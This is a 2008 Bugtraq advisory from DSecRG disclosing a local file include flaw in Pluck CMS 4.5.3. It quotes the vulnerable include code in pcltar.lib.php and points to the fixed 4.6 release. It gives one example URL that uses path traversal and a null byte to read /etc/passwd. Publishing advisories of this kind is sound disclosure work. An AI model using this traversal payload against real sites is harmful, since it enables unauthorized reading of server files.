[DSECRG-08-039] Local File Include Vulnerability in Pluck CMS 4.5.3



Hello, bugtraq.

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-039


Application: Pluck CMS
Versions Affected: 4.5.3
Vendor URL: http://www.pluck-cms.org/
Bug: Local File Include
Exploits: YES
Reported: 25.08.2008
Vendor Response: 30.08.2008
Solution: YES
Date of Public Advisory: 18.11.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Pluck CMS has Local File Include vulnerability.



Details
*******

1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php

Successful exploitation requires that "register_globals" is enabled.

Code
----
#################################################

if (!isset($g_pcltar_lib_dir))
$g_pcltar_lib_dir = "lib";

...

$g_pcltar_extension = "php";

if (!defined("PCLERROR_LIB"))
{
include("data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension");
}
if (!defined("PCLTRACE_LIB"))
{
include("data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension");
}

#################################################

Example:

http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00



Solution
********
Vendor fix this flaw on 09.08.2008. New version of Pluck CMS 4.6 can be download here:


http://www.pluck-cms.org/downloads/click.php?id=8



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)



Relevant Pages

  • [DSECRG-08-037] Multiple Local File Include Vulnerabilities in Pluck CMS 4.5.2
    ... First discovered by AmnPardaz Security Research Team. ... attacker still can exploit this vulnerability from index.php file. ... Pluck CMS has security module that checks for hacking attempts and blocks them. ... This vulnerability can be exploited only on systems that accept backslash as a path separator. ...
    (Bugtraq)
  • SecurityFocus Microsoft Newsletter #165
    ... Tenable Security ... distribute, manage, and communicate vulnerability and intrusion detection ... Microsoft Internet Explorer MHTML Forced File Execution Vuln... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #174
    ... This issue sponsored by: Tenable Network Security ... the worlds only 100% passive vulnerability ... MICROSOFT VULNERABILITY SUMMARY ... Novell Netware Enterprise Web Server Multiple Vulnerabilitie... ...
    (Focus-Microsoft)
  • [NT] Cumulative Security Update for Internet Explorer (MS04-038)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... CSS Heap Memory Corruption Vulnerability, ... Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 ...
    (Securiteam)
  • SecurityFocus Microsoft Newsletter #171
    ... Better Management for Network Security ... GoodTech Telnet Server Remote Denial Of Service Vulnerabilit... ... ASPApp PortalAPP Remote User Database Access Vulnerability ...
    (Focus-Microsoft)